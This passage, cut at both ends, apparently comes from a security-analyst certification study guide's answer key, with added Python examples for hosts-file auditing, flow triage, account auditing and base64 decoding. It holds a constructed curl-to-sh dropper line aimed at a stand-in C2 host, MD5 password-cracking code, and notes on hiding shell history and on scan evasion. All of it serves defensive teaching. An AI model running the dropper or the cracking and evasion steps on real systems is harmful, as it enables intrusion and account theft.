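    """Return [(ip, hostname)] for every mapping, ignoring comments, blank and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            entries.append((str(ip), name.lower()))
    return entries


def audit_hosts(text, watched=WATCHED_SUFFIXES):
    """Findings as (kind, ip, name): 'update-hijack' for a watched domain mapped anywhere locally,
    'sinkhole' for any other non-localhost name mapped to loopback or the unspecified address."""
    findings = []
    for ip, name in parse_hosts(text):
        if name == "localhost":
            continue
        addr = ipaddress.ip_address(ip)
        if any(name == s or name.endswith("." + s) for s in watched):
            findings.append(("update-hijack", ip, name))
        elif addr.is_loopback or addr.is_unspecified:
            findings.append(("sinkhole", ip, name))
    return findings
```

On Windows the file lives at %SystemRoot%\System32\drivers\etc\hosts and on Unix-like systems at /etc/hosts; the same parser applies to both, and comparing the parsed entries against a known baseline catches additions that a casual look at the file misses.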


D. The POST shows a file being uploaded, and the GET shows an attempt to retrieve it. If 
Cynthia doesn’t expect her system to allow uploads, she should check into what occurred. If 
she searches for r57.php, she will become much more concerned; it is a well-known PHP 
web shell that gives an attacker remote control of the server! 


A. Rhonda’s next step is to prepare to pivot. To do so, she needs to browse for additional 
systems and to identify the methods she will use to access them. At times, this will move 
her back into the discovery phase. 


A. Port security filters on MAC address and the command Ben executed changed the 
MAC address of his PC. In most cases, simply changing a MAC address will not help him 
bypass NAC, and both firewalls and IPS won’t care about his MAC address. 


A. The nmap -T flag accepts a setting between 0 (“paranoid”) and 5 (“insane”). 
When Scott sets his scan to use the insane setting, it will perform the fastest scanning it 
can, which will likely set off any IDS or IPS that is watching for scans. 


D. Microsoft SQL typically runs on TCP ports 1433 and 1434. Oracle’s default is 1521, 
IRC is 6667, and VNC is 5900. 


B. Alice can use trend analysis to help her determine what attacks are most likely to tar- 
get her organization and then take action based on the trends that are identified. 


B. Cloudflare, Akamai, and other content distribution networks use a network of distrib- 
uted servers to serve information closer to requesters. In some cases, this may make parts 
of a vulnerability scan less useful, while others may remain valid. Here, Andrea simply 
knows that the content is hosted in a CDN and that she may not get all of the information 
she wants from a scan. 


C. The whoami command will show the username and its domain. This can be useful 
when determining whether a service is running as a user or a service account. 


B. Large data flows leaving an organization’s network may be a sign of data exfiltration 
by an advanced persistent threat. Using HTTPS to protect the data while making it look 
less suspicious is a common technique. 
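
The flow analysis this answer and the earlier SIEM top-talkers answer (Lucca) describe, as an added example that is not from the book: load NetFlow-style records, rank sources by bytes sent, and pull out internal-to-external conversations that either moved an unusual volume or went to a destination on a threat list. The records, the internal address range and the threat-list hit are constructed for the example.

```python
"""Flow-record triage: top talkers and large outbound transfers (added example, not from the book)."""
import csv
import io
import ipaddress
from collections import Counter, defaultdict

# Constructed flow export (one record per unidirectional flow, bytes = payload sent by src).
FLOWS_CSV = """\
start,src,dst,sport,dport,proto,bytes
2024-05-01T09:00:00,10.0.5.23,198.51.100.44,51234,443,tcp,18234
2024-05-01T09:00:05,10.0.5.23,198.51.100.44,51235,443,tcp,9811
2024-05-01T09:01:00,10.0.5.40,10.0.1.10,45000,445,tcp,402311
2024-05-01T09:02:00,10.0.1.10,10.0.5.40,445,45000,tcp,2311
2024-05-01T09:03:00,10.0.5.77,203.0.113.9,49152,443,tcp,4831764523
2024-05-01T09:10:00,10.0.5.77,203.0.113.9,49153,443,tcp,3921115000
2024-05-01T09:12:00,10.0.5.23,198.51.100.12,51300,80,tcp,2200
"""

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed internal range for the example
KNOWN_BAD = {"203.0.113.9"}                               # assumed threat-intel hit (constructed)


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def load_flows(text):
    """Parse the CSV export into dicts with numeric port and byte counts."""
    flows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["dport"] = int(row["dport"])
        row["bytes"] = int(row["bytes"])
        flows.append(row)
    return flows


def top_talkers(flows, n=3):
    """Bytes sent per source address, largest first."""
    totals = Counter()
    for f in flows:
        totals[f["src"]] += f["bytes"]
    return totals.most_common(n)


def outbound_candidates(flows, threshold_bytes=1_000_000_000):
    """Internal -> external conversations (src, dst, dport) that moved >= threshold bytes
    or went to a known-bad destination, largest first. HTTPS on 443 hides the content,
    which is exactly why the volume and the destination are what an analyst has to go on."""
    totals = defaultdict(int)
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            totals[(f["src"], f["dst"], f["dport"])] += f["bytes"]
    hits = [(src, dst, dport, b) for (src, dst, dport), b in totals.items()
            if b >= threshold_bytes or dst in KNOWN_BAD]
    return sorted(hits, key=lambda h: -h[3])
```

A fixed byte threshold is the crude version; in a SIEM the same query is usually expressed as a deviation from each host's own daily baseline, so a file server moving gigabytes internally does not drown out a workstation sending its first gigabyte to the Internet.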


A. Windows 10 Pro and Enterprise support application whitelisting. Chris can whitelist 
his allowed programs and then set the default mode to “disallowed”, preventing all 
other applications from running and thus blacklisting the application. This can be a bit of 
a maintenance hassle but can be useful for high-security environments or those in which 
limiting what programs can run is critical. 


C. While some blacklists use entire IP ranges, changing IP addresses for SMTP servers is 
often a valid quick fix. Some organizations even discover that one server has been black- 
listed and others in their cluster have not been. Migrating to a cloud provider or working 
with the blacklisting organizations can help, and online validation tools can help Lauren 
quickly check which lists her organization is on. Changing SMTP headers won’t help! 
A. Tracy knows that most wired networks do not use end-to-end encryption by default 
and that wireless networks are typically more easily accessible than a wired network 
that requires physical access to a network jack or a VPN connection from an authorized 
account. Without more detail, she cannot determine whether authentication is required 
for both networks, but NAC is a common security feature of wired networks, and WPA2 
Enterprise requires authentication as well. Port security is used only for wired network 
connections. 


B. Most infrastructure-as-a-service providers will allow their customers to perform 
security scans as long as they follow the rules and policies around such scans. Ian should 
review his vendor’s security documentation and contact them for details if he has ques- 
tions. 


B. Port 3389 is the service port for RDP. If Fred doesn’t expect this port to be open on his 
point-of-sale terminals, he should immediately activate his incident response plan. 


D. Many system administrators have historically chosen 8080 and 8443 as the alternate 
service ports for plain-text and secure web services. While these ports could be used for 
any service, it would be reasonable for Cynthia to guess that a pair of services with ports 
like these belong to web servers. 


C. Using a UDP scan, as shown in option C, with the -sU flag will not properly identify 
printers since print service ports are TCP ports. The other commands will properly scan 
and identify many printers based on either their service ports (515, 631, 9100) or their OS 
version. 


B. TCP ports 1433 and 1434 are commonly associated with Microsoft SQL servers. A 
print server will likely use ports 515, 631, and 9100; a MySQL server will typically use 
3306; and alternate ports for web servers vary, but 8443 is a common alternative port. 


B. This nmap scan will scan for ssh (22), SMTP (25), DNS (53), and LDAP (389) on their 
typical ports. If the services are running on an alternate port, this scan will completely 
miss those and any other services. 


D. Linux and Unix systems typically keep user account information stored in /etc/ 
passwd, and /etc/shadow contains password and account expiration information. Using 
diff between the two files is not a useful strategy in this scenario. 


C. Load balancers can alias multiple servers to the same hostname. This can be confusing 
when conducting scans, as it may appear that multiple IP addresses or hosts are respond- 
ing for the same system. 


C. Best practice for most network devices is to put their administrative interfaces on a 
protected network. Many organizations then require administrators to connect via a jump 
box, adding another layer of protection. Preventing console access is typically not desir- 
able in case changes need to be made and a GUI is not available; login-block can help but 
will only slow down attacks and will not prevent them. 
C. This scan shows only UDP ports. Since most services run as TCP services, this scan 
wouldn’t have identified most common servers. Ron should review the commands that his 
team issued as part of their exercise. If he finds that nmap was run with a -sU flag, he will 
have found the issue. 


C. A password combined with token-based authentication can prevent brute-force attacks 
that might succeed against a password or password and PIN combination. Biometric fac- 
tors are useful but often have significant maintenance and deployment overhead and are 
typically more difficult to use than a token-based second factor. 


C. This command will prevent commands entered at the bash shell prompt from being 
logged, as they are all sent to /dev/null. This type of action is one reason that adminis- 
trative accounts are often logged to remote hosts, preventing malicious insiders or attack- 
ers who gain administrative access from hiding their tracks. 


C. Monica issued a command that only stops a running service. It will restart at reboot 
unless the scripts or unit files that start it are disabled as well. On current Ubuntu systems, 
that is handled by systemd (systemctl disable); older releases used Upstart, and some services 
still use init.d scripts. In either case, when asked a question like this, you can quickly 
identify this as a problem that occurred at reboot and remove the answer that isn’t likely 
to be correct. 


A. DNSSEC allows authoritative DNS servers to digitally sign their responses so that 
resolvers can validate that the records were not altered in transit. 


B. Nathan is part of the white team, which manages the environment. The red team 
attacks, and the blue team defends. Black team is not a term that is commonly used in 
this context, but some organizations identify purple and green teams (often with varying 
descriptions for their responsibilities, which is admittedly confusing!). 


B. nmap provides both hardware and operating system identification capabilities as part of 
its common platform enumeration features. cpe:/o indicates operating system identification, 
and cpe:/h indicates hardware identification. 


D. The rules of engagement for a penetration test typically describe the scope, timing, 
authorization, and techniques that will be used (or that are prohibited). This helps to 
ensure that unexpected impacts are minimized and allows both the tester and the target 
organization to understand what will occur. Specifically listing authorized tools is not 
typical for most rules of engagement. 


D. DNS blackholing uses a list of known malicious domains or IP addresses and relies on 
listing the domains on an internal DNS server, which provides a fake reply. Route poison- 
ing prevents networks from sending data to a destination that is invalid. Routers do not 
typically have an anti-malware filter feature, and subdomain whitelisting was made up for 
this question. 


A. RADIUS typically uses UDP ports 1812 (authentication) and 1813 (accounting). Kerberos 
is primarily a UDP service on port 88, although it also uses TCP 544 (kshell) and 2105 
(eklogin); Postgres uses 5432; and VNC servers listen on 5900 (5500 is the viewer’s 
listening port for reverse connections). 
B. John has discovered a program that is accepting connections and has an open 
connection, neither of which is typical for the Minesweeper game. Attackers often disguise 
Trojans as innocuous applications, so John should follow his organization’s incident 
response plan. 


B. nmap supports quite a few firewall evasion techniques including spoofing the MAC 
(hardware) address, appending random data, setting scan delays, using decoy IP 
addresses, spoofing the source IP or port, modifying the MTU size, or intentionally frag- 
menting packets. 


B. FGDump is a tool used for Windows password auditing. If successful, it will dump the 
username and password hash for every user. 


A. The dig command provides information including the time the query was done, 
details of the query that was sent, and the flags sent. In most cases, however, host, 
dig -x, and nslookup will provide roughly the same information. zonet is not an actual 
Linux command. 


C. The which command will show Selah where the bash executable is being run from, 
typically /bin/bash. If she finds that bash is running from a user directory or somewhere 
else suspicious, she should immediately report it! (If you’re familiar with the printenv 
command, option D may be tricky; printenv doesn’t accept specific flags, so Selah would 
need to pipe the output to grep or to search it manually to find bash there.) 


D. Adam is using a jump box to provide access. A jump box, sometimes called a jump 
server or secure administrative host, is a system used to manage devices in a separate, typ- 
ically higher security zone. This prevents administrators from using a less secure adminis- 
trative workstation in the high security zone. 


A. Adding an iptables entry uses the -A flag to add to a list. Here, you can safely 
assume that OUTPUT is the outbound ruleset. The -d flag is used to designate the IP 
address or subnet range, and -j specifies the action, DROP. 


A. When an organization expires multiple certificates, it often indicates a security prob- 
lem that resulted in a need to invalidate the certificates. Fred should check for other infor- 
mation about a possible compromise near the dates of expiration. 


B. Both using CAPTCHAs to prevent bots and implementing a reasonable rate-limiting 
policy can limit the bulk collection of data. Privacy and proxy services help keep reg- 
istrant data private. Blacklisting is useful to temporarily block abusive IP addresses or 
networks but can result in long-term issues if it is broadly used or if a legitimate site is 
blocked. Finally, not publishing TLD zone files can help limit WHOIS abuse, but not all 
TLDs can avoid doing so. 


D. Casey knows that she saw three open ports and that nmap took its best guess at what 
was running on those ports. In this case, the system is actually a Kali Linux system, a 
Debian-based distribution. This is not a Cisco device, it is not running CentOS, and it was 
not built by IBM. 
B. The rules of engagement are the rules under which a penetration test or other security 
assessment is conducted. They typically list what type of assessment will be done; when, 
where, and how it will be conducted; what communication and notification will be done; 
and other details that are critical to ensure that the assessment is done in a way that meets 
the organization’s needs. 


D. Since a UDP scan cannot reliably distinguish a closed port from a filtered one (a probe 
that is silently dropped looks the same as one that reached no service), and SNMP agents 
do not respond at all to requests with an invalid community string, any of these answers 
could be true. This means that receiving “no response” to an SNMP query can mean that the 
machines are unreachable (often due to a firewall), they are not running SNMP, or the 
community string that was used is incorrect. 


B. Angela can use Network Miner, a tool that can analyze existing packet capture files to 
do OS identification and which identifies and marks images, files, credentials, sessions, 
DNS queries, parameters, and a variety of other details. Ettercap can perform passive 
TCP stack fingerprinting but is primarily a man-in-the-middle tool, dradis is an open 
source collaboration platform for security teams, and Sharkbait is not a security tool or 
term. 


C. Rick’s team has set up a honeynet, which is a group of systems set up to attract 
attackers while capturing the traffic they send and the tools and techniques they use. A 
honeypot is a single system set up in a similar way, while a tarpit is a system set up to slow 
down attackers. A blackhole is often used on a network as a destination for traffic that 
will be silently discarded. 


A. A canonical name (CNAME) is used to alias one name to another. MX records identify 
the mail exchangers (MXes) for a domain, SPF records (published as TXT records) list the 
hosts that are authorized to send mail for a domain, and an SOA record is the Start of 
Authority record that marks the beginning of a zone and carries its primary name server, 
administrator contact, serial number, and refresh/retry/expire timers. 


C. AppLocker is a tool available for Windows 10 systems that allows rules based on file 
attributes to limit what applications and files users can run, including executable files, 
scripts, Windows Installer files, DLLs, packaged applications, and packaged application 
installers. Secpol.msc is the security policy snap-in and controls other parts of the 
Windows security configuration. FileVault is the macOS file encryption system, and GPed 
is a made-up program. 


C. This output shows a brute-force attack run against the localhost’s root account using 
ssh. This resulted in the root user attempting to re-authenticate too many times, and PAM 
has blocked the retries. Fail2ban is not set up for this service. Thus, this is the one item 
that has not occurred. If it was enabled, the fail2ban log would read something like this: 


2017-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Ban 127.0.0.1 
2017-07-11 12:00:00,111 fail2ban.actions: WARNING [ssh] Unban 127.0.0.1 


C. When a vulnerability exists and a patch has not been released or cannot be installed, 
compensating controls can provide appropriate protection. In the case of PCI-DSS (and 
other compliance standards), documenting what compensating controls were put in place 
and making that documentation available is an important step for compliance. 




B. In many cases, backups are the best method to minimize the impact of a ransomware 
outbreak. While preventative measures can help, malware packages continue to change 
more quickly than detective controls like anti-malware software and NGFW device manu- 
facturers can react. A honeypot won’t help Adam prevent ransomware, so it can be easily 
dismissed when answering this question. 


A. Metasploit is primarily an exploitation tool. While it has modules that can be used 
for reconnaissance, it is primarily used to target discovered vulnerabilities. nmap, Nessus, 
and Maltego are all commonly used to discover information about an organization or 
individuals. 


C. The -sP flag for nmap indicates a ping scan (current nmap versions call this -sn but still 
accept -sP), and /24 indicates a range of 256 addresses. In this case, that means that nmap 
will scan for hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 IP address range. 


A. Kara is performing a decomposition process on the malware she is investigating. 
Decomposition helps to understand a software package or program and can sometimes 
provide information more quickly than a static or dynamic analysis, because it does not 
have to run a program to analyze how it behaves and does not require intensive manual 
review of the underlying code or disassembly of compiled code. 


B. Identifying a SQL injection attack requires the ability to see the content of the query. 
Most stateful packet inspection firewalls do not show full packet content and instead log 
a success or fail based on a port, IP address, and protocol based on a rule. A DDoS attack 
may also be difficult to identify, but the massive amount of traffic from multiple sources 
to a single service can help point out the issue. 


B. Performing a scan from an on-site network connection is the most likely to provide 
more detail. Many organizations have a strong external network defense but typically 
provide fewer protections for on-site network connections to allow internal users to access 
services. It is possible that the organization uses services found only on less common ports 
or UDP-only services, but both of these options have a lower chance of being true than 
for an on-site scan to succeed. nmap does provide firewall and IPS evasion capabilities, but 
this is also a less likely scenario. 


C. Gathering traceroute information about each system in a network can help provide 
insight into the network’s topology, including where routers, switches, and other devices 
may be located. It is not typical for ISPs to conduct unannounced scans, vulnerability 
scans would include additional scan traffic, and routers do not probe individual systems 
for BGP discovery. 


C. According to the Defense Microelectronics Activity (DMEA) website: “DMEA accred- 
its suppliers in the areas of integrated circuit design, aggregation, broker, mask manu- 
facturing, foundry, post processing, packaging/assembly and test services. These services 
cover a broad range of technologies and is intended to support both new and legacy appli- 
cations, both classified and unclassified.” This program acts to ensure that electronics are 
not compromised as part of their design process. 
B. BGP looking glasses provide a public view of route information to hosts and networks. 
This can provide information to penetration testers about network connectivity. While 
nmap has many capabilities, it doesn’t provide route lookups. BGP route reflectors are real 
(they re-advertise routes learned from one iBGP peer to other iBGP peers so that a full 
mesh isn’t needed), but they are internal routing infrastructure rather than a public lookup 
service; route/path assimilators were made up for this question. 


C. Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting 
host to a connection rate and volume through filters like those provided by the iptables 
hashlimit match module can help. IP-based blacklisting may work for smaller botnets but is 
difficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping 
all SYN packets would prevent all TCP connections, and route blocking filters are not a 
method used to prevent this type of attack. While he’s setting up firewall rules, Jeff may 
also want to investigate a denial-of-service mitigation partner or service in case the 
attackers move to more advanced methods or simply overwhelm his link! 


C. Passive fingerprinting relies on the ability of a system to capture traffic to analyze. Pre- 
venting systems from using promiscuous mode will provide attackers with very little data 
when performing passive fingerprinting. Both intrusion prevention systems and firewalls 
can help with active fingerprinting but will do nothing to stop passive fingerprinting. 


D. The Windows service controller, sc, provides command-line control of services. 
Commands include start, stop, pause, query, and other service-related commands. Using 
Sc query provides a list of services, their display name, type, state, exit codes, checkpoint, 
and wait hint codes. Geoff can use output like this to check for unexpected services run- 
ning on the system if he has local command-line access for only a limited period of time. 


B. Adam has discovered a supervisory control and data acquisition system (SCADA). 
Typically, BAS indicates that the system is used for building automation. 


D. This view of htop shows both CPU1 and CPU2 are maxed out at 100 percent. 
Memory is just over 60 percent used. Almost all swap space is available. 


B. The top command will show a dynamic, real-time list of running processes. If 
Amanda runs this, she will immediately see that two processes are consuming 99 percent 
of a CPU each and can see the command that ran the program. 


D. The kill command is used to end processes in Linux. Amanda should issue the 
kill -9 command followed by the process ID of the processes she wants to end (the -9 
flag selects the signal, SIGKILL, which a process cannot catch or ignore; a plain kill sends 
SIGTERM and is the politer first attempt when the process might be doing useful work). 
Since she has run both top and htop, she knows that she needs to end processes 3843 and 
3820 to stop stress from consuming all of her resources. A little research after that will 
show her that stress is a stress testing application, so she may want to ask the user who 
ran it why they were using it if it wasn’t part of their job! 


C. Geoff built a reasonable initial list of operating system versions, but many devices on 
a modern network will not match this list, causing operating system version mismatch 
issues with the matching rules he built. He may need to add broader lists of acceptable 
operating systems, or his organization may need to upgrade or replace devices that cannot 
be upgraded to acceptable versions. 
C. Lauren’s screenshot shows behavioral analysis of the executed code. From this, you 
can determine that malwr is a dynamic analysis sandbox that runs the malware sample to 
determine what it does while also analyzing the file. 


B. NAC solutions that implement employee job-function-based criteria often use 
time-based controls to ensure that employees have access only when they are supposed to 
be working, role-based criteria because of their duties, and location-based rules to ensure 
that they access networks only where they work. Rule-based criteria typically focus on 
system health and configuration, thus focusing more on the computer or software than 
the user. 


C. The lsof command (“list open files”) reports on open files and which process opened 
them. Charles can use lsof to find his answer quickly! 


C. Rainbow tables exist for most reasonable passwords hashed with unsalted MD5, which 
means that Chris can likely recover the majority of the passwords belonging to his users 
relatively quickly. Once he is done, he can apply his company’s strong hashing method to 
the recovered passwords and compare the results to the hashed passwords his organization 
stores to find reuse. He may still be better off simply asking all of the impacted users to 
change their passwords if they reused them for the site, and he should consider multifactor 
authentication to avoid the issue in the future. 
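As an added example of the workflow Chris is following (not code from the book or its authors), here is Python that cracks an unsalted-MD5 dump by table lookup and then checks which of the recovered passwords also verify against the organization’s own salted hashes. The leaked dump, the wordlist, the assumed “company strong hashing method” (PBKDF2-HMAC-SHA256 with a random per-user salt and 100,000 iterations) and the organization’s password store are all constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed leaked dump from a third-party site: user -> unsalted MD5 hex (example data, not from the page).
LEAKED_MD5 = {
    "alice": "5f4dcc3b5aa765d61d8327deb882cf99",   # md5("password")
    "bob":   "e10adc3949ba59abbe56e057f20f883e",   # md5("123456")
    "carol": hashlib.md5(b"correct horse battery staple").hexdigest(),  # not in the table below
}

# Stand-in for a rainbow table: precomputed md5 -> plaintext for common passwords.
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome1"]
MD5_TABLE = {hashlib.md5(w.encode()).hexdigest(): w for w in WORDLIST}


def crack_md5(dump):
    """Unsalted MD5 is a pure lookup: every hash present in the table is recovered instantly."""
    return {user: MD5_TABLE[h] for user, h in dump.items() if h in MD5_TABLE}


def strong_hash(password, salt: Optional[bytes] = None, iterations: int = 100_000):
    """Assumed 'company strong hashing method': salted PBKDF2-HMAC-SHA256 in a self-describing string."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_strong(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed copy of the organization's own password store (strong hashes, random per-user salts).
ORG_STORE = {
    "alice": strong_hash("password"),     # alice reused her leaked password at work
    "bob":   strong_hash("Tr0ub4dor&3"),  # bob did not
    "carol": strong_hash("another-unrelated-passphrase"),
}


def find_reuse(leaked_dump, org_store):
    """Users whose cracked third-party password also verifies against the organization's hash."""
    cracked = crack_md5(leaked_dump)
    return sorted(u for u, pw in cracked.items() if u in org_store and verify_strong(pw, org_store[u]))
```

Because the organization’s hashes are salted, there is no table to look them up in; each recovered password has to be verified per user, which is exactly why the leaked site’s unsalted MD5 was the weak link.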


D. While ssh port forwarding and ssh tunneling are both useful techniques for pivoting 
from a host that allows access, nmap requires a range of ports open for default scans. He 
could write a script and forward the full range of ports that nmap checks, but none of the 
commands listed will get him there. If Frank has access to proxychains, he could do this 
with two commands! 


C. Angela has captured part of a Nikto scan that targets a vulnerable .asp script that 
allows directory traversal attacks. If it was successful, the contents of files like boot.ini 
or /etc/passwd would be accessible using the web server. 


A. Since organizations often protect information about the technologies they use, 
searches of support forums and social engineering are often combined to gather informa- 
tion about the technologies they have in place. Port scanning will typically not provide 
detailed information about services and technologies. Social media review may provide 
some hints, but document metadata does not provide much information about specific 
technologies relevant to a penetration test or attack. 


C. LDAP directory servers typically support both soft and hard limits on queries, includ- 
ing the size of the query and how many queries can be conducted in a given time period. 
Setting a hard limit prevents LDAP users from exceeding the number set. A firewall would 
be useful to prevent access, and an IDS could show abuse. Requiring authentication isn’t 
useful for a public service. 


D. The accounts shown are disabled, and disabled accounts with a weak password are 
typically not a problem. If they are an issue, Saria’s best option would be to delete the 
accounts unless they are required for a specific purpose. 
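The two /etc/passwd and /etc/shadow answers in this chapter (the diff question earlier and Saria’s disabled accounts here) are easier to reason about with a small audit script. The following Python is an added example written for this edition, not code from the book or its authors; the passwd and shadow contents are constructed samples with placeholder hashes, and the issue labels are our own. It parses both files, skips locked (“!”) and no-login (“*”) accounts the way the answer suggests, and reports only live problems such as extra UID 0 accounts, empty password fields, and hashes left in the world-readable /etc/passwd.

```python
from collections import defaultdict
from datetime import date

# Constructed sample files (example data, not from the page). Shadow hashes are placeholders.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
svc_backup:x:1002:1002::/var/backup:/bin/sh
toor:x:0:0::/root:/bin/bash
legacy:$1$abcd$legacyhashinpasswd:1003:1003::/home/legacy:/bin/bash
"""

SHADOW = """\
root:$6$salt$roothash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$salt$alicehash:19000:0:99999:7:::
bob:!$6$salt$bobhash:19000:0:99999:7:::
svc_backup::19000:0:99999:7:::
toor:$6$salt$toorhash:19000:0:99999:7:::
legacy:$6$salt$legacyhash:18000:0:99999:7::18500:
"""


def parse_passwd(text):
    """name -> fields of /etc/passwd (world-readable: identity, UID/GID, home, shell)."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        users[name] = {"pw": pw, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """name -> hash and expiry from /etc/shadow (root-only: secrets and account aging)."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        f += [""] * (9 - len(f))          # tolerate short lines
        entries[f[0]] = {"hash": f[1], "expire": int(f[7]) if f[7] else None}
    return entries


def is_disabled(hash_field):
    """Locked ('!' prefix) or no-login ('*') accounts cannot authenticate with a password."""
    return hash_field.startswith(("!", "*"))


def disabled_accounts(shadow_text):
    return {u for u, e in parse_shadow(shadow_text).items() if is_disabled(e["hash"])}


def audit_accounts(passwd_text, shadow_text, today_days=None):
    """Return {user: [issues]} for live risks; disabled accounts are skipped on purpose."""
    if today_days is None:
        today_days = (date.today() - date(1970, 1, 1)).days   # shadow stores days since the epoch
    passwd, shadow = parse_passwd(passwd_text), parse_shadow(shadow_text)
    findings = defaultdict(list)
    for name, u in passwd.items():
        if u["uid"] == 0 and name != "root":
            findings[name].append("extra UID 0 account")
        if u["pw"] == "":
            findings[name].append("empty password in /etc/passwd")
        elif u["pw"] not in ("x", "*", "!"):
            findings[name].append("hash stored in /etc/passwd")
        s = shadow.get(name)
        if s is None:
            findings[name].append("no /etc/shadow entry")
            continue
        if is_disabled(s["hash"]):
            continue                      # a weak hash on a locked account is not a live problem
        if s["hash"] == "":
            findings[name].append("empty password field")
        if s["expire"] is not None and s["expire"] < today_days:
            findings[name].append("account expired")
    return dict(findings)
```

Note that the two files answer different questions: /etc/passwd tells you who exists and what they can run, /etc/shadow tells you whether they can log in and for how long, which is why a plain diff between them is meaningless.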


B. Greg’s implementation is a form of DNS sinkholing that sends traffic to an alternate 
address, which acts as the sinkhole for traffic that would otherwise go to a known bad 
domain. 
B. Malware often uses base64 encoding as part of its obfuscation attempts. There are 
multiple base64 formats, but online decoders can help quickly check to see whether the 
obfuscated code is just base64 encoded. Packers and other tools may use multiple meth- 
ods, making it difficult to figure out quickly. 
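An added example (not from the book or its authors) of the quick base64 check the answer describes, in Python: it tolerates the stripped padding and URL-safe alphabet that obfuscators often use, rejects anything that is not base64 instead of guessing, and peels nested layers only while the result still looks like text. The dropper one-liner and its encoded forms are constructed sample data.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())


def decode_base64_layer(blob):
    """Decode one layer of base64 (standard or URL-safe alphabet, padding optional); None if not base64."""
    s = "".join(blob.split())                       # tolerate line wrapping and stray whitespace
    s = s.replace("-", "+").replace("_", "/")       # fold the URL-safe alphabet onto the standard one
    s = s.rstrip("=")
    if not s or len(s) % 4 == 1:                    # a 4n+1 length can never be valid base64
        return None
    s += "=" * (-len(s) % 4)                        # restore padding that obfuscators often strip
    try:
        return base64.b64decode(s, validate=True)   # validate=True rejects non-alphabet characters
    except binascii.Error:
        return None


def is_printable(data):
    """True if every byte is printable ASCII (tab/newline included): plausible script or command text."""
    return bool(data) and all(b in PRINTABLE for b in data)


def peel_base64(blob, max_layers=5):
    """Strip nested base64 layers while the result stays printable. Returns (layers_removed, final_text)."""
    current, layers = blob, 0
    while layers < max_layers:
        decoded = decode_base64_layer(current)
        if decoded is None or not is_printable(decoded):
            break
        current, layers = decoded.decode("ascii"), layers + 1
    return layers, current


# Constructed samples: a dropper one-liner wrapped the ways malware commonly wraps it (example data).
PAYLOAD = "curl -s http://c2.example.invalid/x.sh | sh"
ONE_LAYER = base64.b64encode(PAYLOAD.encode()).decode()
NO_PADDING = ONE_LAYER.rstrip("=")
URL_SAFE = base64.urlsafe_b64encode(PAYLOAD.encode()).decode()
TWO_LAYERS = base64.b64encode(ONE_LAYER.encode()).decode()
```

If the output of the last layer is not printable, the sample is probably compressed, packed, or encrypted rather than merely encoded, and the quick check has done its job by telling you that.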


C. Jennifer can push an updated hosts file to her domain-connected systems that will 
direct traffic intended for known bad domains to the localhost or a safe system. She might 
want to work with a security analyst or other IT staff member to capture queries sent to 
that system to track any potentially infected workstations. A DNS sinkhole would work 
only if all the systems were using local DNS, and off-site users are likely to have DNS set- 
tings set by the local networks they connect to. Anti-malware applications may not have 
an update yet or may fail to detect the malware, and forcing a BGP update for third-party 
networks is likely a bad idea! 
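Jennifer’s hosts-file approach, as an added example written for this edition (not code from the book or its authors), also shows the DNS blackholing and sinkholing answers earlier in this chapter in their simplest form. The existing hosts file and the domain feed are constructed; the sinkhole address and the marker comment are assumptions. The script refuses to override names that are already defined locally (localhost, intranet hosts), drops malformed entries from the feed, and includes a check that makes the main limitation explicit: hosts files match exact names only, so a sinkholed parent domain does not cover its subdomains.

```python
import re

SINKHOLE_IP = "0.0.0.0"   # or the address of a logging sinkhole host, as the answer suggests
MARKER = "# --- sinkholed domains (managed) ---"

# Constructed existing hosts file and blocklist feed (example data, not from the page).
EXISTING_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
10.1.2.3    intranet.corp.example intranet
"""
BAD_DOMAINS = [
    "evil-c2.example", "EVIL-C2.example",      # duplicate differing only in case
    "update.bad-cdn.example",
    "localhost",                               # must never be overridden
    "intranet.corp.example",                   # already defined locally; refuse to clobber
    "not a domain",                            # junk from a sloppy feed
]

# RFC 1123-style hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing '-', at least one dot.
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-z0-9-]{1,63}(?<!-))+$")


def defined_names(hosts_text):
    """Every hostname already mapped in a hosts file (comments and blank lines ignored)."""
    names = set()
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            names.update(n.lower() for n in line.split()[1:])
    return names


def build_sinkholed_hosts(existing, bad_domains, sinkhole=SINKHOLE_IP):
    """Append one sinkhole entry per valid, not-yet-defined bad domain. Returns (new_text, skipped)."""
    existing_names = defined_names(existing)
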